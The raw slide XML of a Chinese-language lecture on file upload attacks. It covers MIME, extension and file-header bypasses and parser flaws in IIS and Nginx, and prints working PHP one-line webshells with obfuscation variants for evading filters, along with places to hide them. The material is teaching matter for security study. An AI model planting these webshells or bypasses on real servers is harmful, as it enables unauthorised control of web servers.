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2" r:id="rId3"/>
    <p:sldId id="413" r:id="rId4"/>
    <p:sldId id="414" r:id="rId5"/>
    <p:sldId id="415" r:id="rId6"/>
    <p:sldId id="416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17" r:id="rId20"/>
    <p:sldId id="419" r:id="rId21"/>
    <p:sldId id="420" r:id="rId22"/>
    <p:sldId id="418" r:id="rId23"/>
    <p:sldId id="433" r:id="rId24"/>
    <p:sldId id="434" r:id="rId25"/>
    <p:sldId id="435" r:id="rId26"/>
    <p:sldId id="436" r:id="rId27"/>
    <p:sldId id="437" r:id="rId28"/>
    <p:sldId id="438" r:id="rId29"/>
    <p:sldId id="366" r:id="rId3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7016" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="84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https://blog.csdn.net/weixin_39190897/article/details/86772765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cmd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=header("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Content-type:text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html;charset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gbk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"); exec("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ipconfig",$out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echo '&lt;pre&gt;';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print_r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($out); echo '&lt;/pre&gt;';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39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Medium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>绕过：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>image/jpeg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9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可以看做是“猪队友”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35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IIS7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>存在的解析漏洞要比</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>6.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>少，主要是对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>解析时存在类似</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Ngnix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的解析漏洞。</a:t>
            </a:r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copy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t> xx.jpg/b + yy.txt/a xy.jpg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9878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41148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2004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17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第六讲 文件上传攻击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MIME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型检测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MIME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型是描述消息内容类型的因特网标准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828800"/>
            <a:ext cx="6276975" cy="2390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347220"/>
            <a:ext cx="7000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5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MIME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型绕过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利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>抓包，将报文中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Content-Type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>改成允许的类型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Content-Type: image/gif</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Content-Type: image/jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Content-Type: image/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441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服务器端文件扩展名检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>黑名单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119312"/>
            <a:ext cx="110585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50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服务端文件扩展名检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>黑名单绕过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后缀名大小写，例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pHp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>寻找黑名单中没有被禁止的文件类型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>以下文件同样会被解析</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>php|php2|php3|php4|php5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>asp|aspx|asa|cer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500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服务器文件内容检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件头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112872"/>
            <a:ext cx="6205828" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>图片格式往往不是根据文件后缀名去做判断的。文件头是文件开头的一段二进制，不同的图片类型，文件头是不同的。文件头又称文件幻数。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>常见文件幻数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/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JPG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FF D8 FF E0 00 10 4A 46 49 46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GIF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47 49 46 38 39 61 (GIF89a)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89 50 4E 47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79525"/>
            <a:ext cx="5300372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23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文件解析攻击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部分低版本的中间件存在解析漏洞，导致虽然后缀名合法，但会造成解析错误，导致木马执行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.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件会被当做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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件执行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>危害在于：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应用防护看似很到位，但仍存在安全隐患</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主流中间件在老版本中均存在解析漏洞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5404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解析漏洞攻击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中间件早期版本在后缀解析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>test.php.x1.x2.x3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>时，从右到左开始判断后缀，最后被解析为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>另外需要注意，很多人使用集成环境部署</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器，需要严格检查集成环境中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>版本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560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IIS6.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>解析漏洞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50553"/>
            <a:ext cx="10287000" cy="51054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目录解析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目录名为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，则目录下的所有文件都会被作为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解析。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/test.asp/shell.jpg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会被当作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脚本运行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文件解析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文件名中分号后不被解析，例如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.asp;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/test.asp;shell.jpg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会被当作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脚本运行。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文件类型解析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asa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.cdx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都会被作为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文件执行。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shell.asa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会被作为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文件执行。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1213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解析漏洞攻击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对于任意文件名，在后面添加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任意文件名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的解析漏洞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比如原文件名是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test.jpg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，可以添加为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test.jpg/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x.php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还有一种针对低版本的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，可以在任意文件名后面添加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%00.php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这个漏洞其实来自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php-cgi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的漏洞，与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Ngnix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无关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PHP+nginx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默认是以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cgi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的方式去运行，当用户配置不当，会导致任意文件被当作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去解析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FastCGI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运行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cgi.fix_pathinfo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=1(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全版本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默认为开启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011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木马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攻击者的目标：获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器的控制权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>需要利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马获取权限并持续控制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马是一种网页形态的木马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开设持续使用的后门</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>后续提权</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据库连接</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>修改页面，添加暗链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62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上传攻击的原理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上传攻击的条件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上传检测绕过技术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文件解析攻击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38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42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43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木马的原理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一句话木马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实现木马功能的代码越多，木马的特点越明显，越容易被发现</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>“一句话木马”是一种特征性很强的脚本后门</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>最大功能是打开窗口</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>实现方式是定义一个执行页面，并设计一个传参数点，接收外部给出的参数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>经典的一句话木马  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($_POST[‘c’]); ?&gt;</a:t>
            </a:r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eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：执行后面请求到的数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>$_POST[‘c’]:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>获取客户端提交的数据，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>为某一个参数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224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WEBSHELL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>之</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一句话木马解读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1215"/>
            <a:ext cx="11811000" cy="49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木马的特点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从某个角度讲，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马也是应用页面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马可大可小</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>最小的是一句话木马</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>无法有效隐藏</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击者一般填充大量无效密码进行迷惑</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>具有明显特征</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>需要调用关键函数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Eval,system,exec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必须为可执行的网页格式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>需要被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器解析执行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1512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一句话木马的变形技巧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689600" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如果不做伪装，不对特征进行隐藏或变形，会被防护设备过滤</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>变形技巧</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>更换执行数据来源</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字符替换或特殊编码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>采用隐匿手段</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>混合上述手段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 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 ='assert';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array_map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("$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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a",$_REQUEST</a:t>
            </a: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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$item['JON'] = 'assert';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$array[ ] = $item;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$array[0]['JON']($_POST['TEST']);  //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密码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最终实现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assert($_REQUEST)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35455-46F9-488C-8325-ABA91346061A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="990600" y="4419600"/>
            <a:ext cx="4648200" cy="1676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php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中有许多的代码执行函数</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>例如</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;php  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>$_request[8]);?&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>eval </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>把字符串作为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>代码执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以多行执行</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;php  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>assert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>$_request[8]);?&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>assert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>将传入的参数当成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>只能单行执行</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17109696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更换执行数据来源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POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>方式被过滤，可以利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>替换</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>方式在使用方式与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>方式没有太大区别</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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$_GET[a]($_GET[b]); ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL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en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Yy5waHA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>解码之后是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>c.php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&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>代替</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;? &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;script language=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>”&gt;@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>eval_r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>($_GET[b])&lt;/script&gt;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6098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字符替换或特殊编码（在后端恶意脚本里）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使用字符替换防止关键字过滤</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>$a=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>str_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> (x,””,”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>axsxxsxexrxxt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字符串组合法隐藏关键字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 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aerst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{0}.$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{3}.$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{3}.$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{1}.$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{2}.$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{4};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@$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($_POST['c']);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2363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木马隐匿手段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如果放在根目录或者其他明显的位置，很容易被安全人员发现并删除</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>常见木马的隐匿点有如下几个</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>404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/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>图片或日志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2126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小马与大马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6299200" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
